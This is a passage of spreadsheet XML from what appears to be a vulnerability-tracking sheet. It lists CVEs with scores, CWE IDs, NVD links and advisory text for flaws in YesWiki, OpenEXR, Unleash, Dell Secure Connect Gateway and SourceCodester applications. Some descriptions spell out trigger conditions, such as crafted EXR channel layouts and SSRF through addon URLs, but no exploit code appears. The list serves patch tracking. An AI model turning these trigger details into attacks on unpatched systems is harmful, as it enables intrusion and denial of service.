      <c r="O888" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P888" s="5" t="inlineStr"/>
      <c r="Q888" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="R888" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, Bazar form-field templates still apply |raw('html') to field.label / field.hint in attribute and label-body contexts, resulting stored XSS in form renders. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52772</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59183</t>
        </is>
      </c>
      <c r="D889" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E889" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F889" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr"/>
      <c r="L889" s="5" t="inlineStr"/>
      <c r="M889" s="5" t="inlineStr"/>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr"/>
      <c r="Q889" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R889" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.1.0 through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, an int32_t multiplication in OpenEXRCore's unpack_sample_table() can overflow while decoding a crafted deep tiled EXR file, producing an invalid pointer that leads to a read from an unmapped memory address and a crash. Because the overflow occurs in the standard decoding path (exr_decoding_run), any application that decodes deep tiled EXR files is affected. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59183</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59983</t>
        </is>
      </c>
      <c r="D890" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E890" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F890" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr"/>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr"/>
      <c r="Q890" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R890" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable on ILP32 builds to an out-of-bounds read. The vulnerability is reached when a crafted uncompressed deep-tile EXR causes the sample-count table size calculation in OpenEXRCore decoding.c to wrap before unpack_sample_table() iterates over the full attacker-controlled tile dimensions, allowing denial of service. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59983</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59984</t>
        </is>
      </c>
      <c r="D891" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E891" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F891" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr"/>
      <c r="L891" s="5" t="inlineStr"/>
      <c r="M891" s="5" t="inlineStr"/>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr"/>
      <c r="Q891" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R891" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.1.0 through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable on ILP32 builds to an out-of-bounds write. When a crafted B44-compressed scanline EXR causes the logical scratch size to truncate before allocation and uncompress_b44_impl() writes using the attacker-controlled channel width, allowing denial of service and memory corruption. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59984</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59985</t>
        </is>
      </c>
      <c r="D892" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E892" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F892" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr"/>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr"/>
      <c r="Q892" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R892" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.2.0 through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable on ILP32 builds to a heap out-of-bounds read. The issue occurs when a crafted RLE-compressed EXR causes the 64-bit unpacked size to truncate before allocation in OpenEXRCore decoding.c and unpack_32bit() reads beyond the resulting buffer, allowing denial of service. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59985</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61555</t>
        </is>
      </c>
      <c r="D893" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E893" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F893" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr"/>
      <c r="L893" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr"/>
      <c r="Q893" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R893" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable to crashing. This occurs when Imf::GetChannelsInMultiPartFile() processes a crafted EXR with an empty multiView header attribute and Imf::viewFromChannelName() indexes the empty vector for a dotless channel name. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61555</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63004</t>
        </is>
      </c>
      <c r="D894" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E894" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F894" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr"/>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr"/>
      <c r="Q894" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R894" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 7.5.2, 7.6.5, and 8.0.2, the addon and integration subsystem passes the operator-controlled parameters.url value from src/lib/addons/webhook.ts and the Slack, Microsoft Teams, Datadog, and New Relic integrations to Addon.fetchRetry in src/lib/addons/addon.ts without restricting loopback, link-local, private, or cloud metadata addresses. An authenticated actor with the root CREATE_ADDON or UPDATE_ADDON permission can cause the server to send requests from inside its network boundary, use integration event status as a blind probing oracle, forward Authorization, customHeaders, or DD-API-KEY values to an attacker-observed host, and deliver the feature-event JSON body to internal services. This issue is fixed in versions 7.5.2, 7.6.5, and 8.0.2.</t>
        </is>
      </c>
      <c r="S894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63004</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68514</t>
        </is>
      </c>
      <c r="D895" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E895" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F895" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr"/>
      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr"/>
      <c r="Q895" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R895" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13, the PyOpenEXR Python bindings contain a heap out-of-bounds write triggered when reading a crafted deep scanline EXR file. When a deep file declares a literal channel named left alongside layer-prefixed RGB channels left.R, left.G, and left.B, the wrapper processes the literal left channel first and allocates a scalar deep sample array for it, then reuses that same array as the coalesced destination for the prefixed RGB group. The deep reader registers sample slices with an RGB stride (three lanes) into storage that was allocated with scalar shape, so decoding the deep samples writes past the allocation. Opening such a file through the default public Python API, OpenEXR.File(path), causes a heap buffer overflow during normal deep sample decode, leading to memory corruption and a crash. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="S895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68514</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78487</t>
        </is>
      </c>
      <c r="D896" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E896" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F896" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L896" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr"/>
      <c r="Q896" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R896"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S896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78487</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79694</t>
        </is>
      </c>
      <c r="D897" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E897" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F897" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L897" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr"/>
      <c r="Q897" s="5" t="inlineStr">
        <is>
          <t>CWE-215</t>
        </is>
      </c>
      <c r="R897" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insertion of Sensitive Information Into Debugging Code vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="S897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79694</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79945</t>
        </is>
      </c>
      <c r="D898" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E898" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F898" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L898" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr"/>
      <c r="Q898" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R898"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S898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79945</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79947</t>
        </is>
      </c>
      <c r="D899" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E899" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F899" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L899" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr"/>
      <c r="Q899" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R899"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script injection.</t>
        </is>
      </c>
      <c r="S899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79947</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80124</t>
        </is>
      </c>
      <c r="D900" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E900" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F900" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr"/>
      <c r="Q900" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R900"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S900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80124</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86210</t>
        </is>
      </c>
      <c r="D901" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E901" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F901" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr"/>
      <c r="L901" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr"/>
      <c r="Q901" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R901" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is an unknown functionality of the file /delete_user_account.php. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="S901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86210</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86222</t>
        </is>
      </c>
      <c r="D902" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E902" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F902" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K902" s="5" t="inlineStr"/>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr"/>
      <c r="Q902" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R902" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Class and Exam Timetabling System 1.0. This affects the function mysqli_query of the file /admin/modal_add_course2.php. Such manipulation of the argument course leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86222</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86239</t>
        </is>
      </c>
      <c r="D903" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E903" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F903" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr"/>
      <c r="L903" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr"/>
      <c r="Q903" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="R903" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in liufee FeehiCMS up to 2.1.1. The impacted element is the function UeditorAction::init of the file backend/widgets/ueditor/UeditorAction.php of the component UEditor Widget. The manipulation leads to unrestricted upload. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86239</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86260</t>
        </is>
      </c>
      <c r="D904" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E904" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F904" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr"/>
      <c r="L904" s="5" t="inlineStr"/>
      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr"/>
      <c r="Q904" s="5" t="inlineStr">
        <is>
          <t>CWE-620, CWE-640</t>
        </is>
      </c>
      <c r="R904" s="5" t="inlineStr">
        <is>
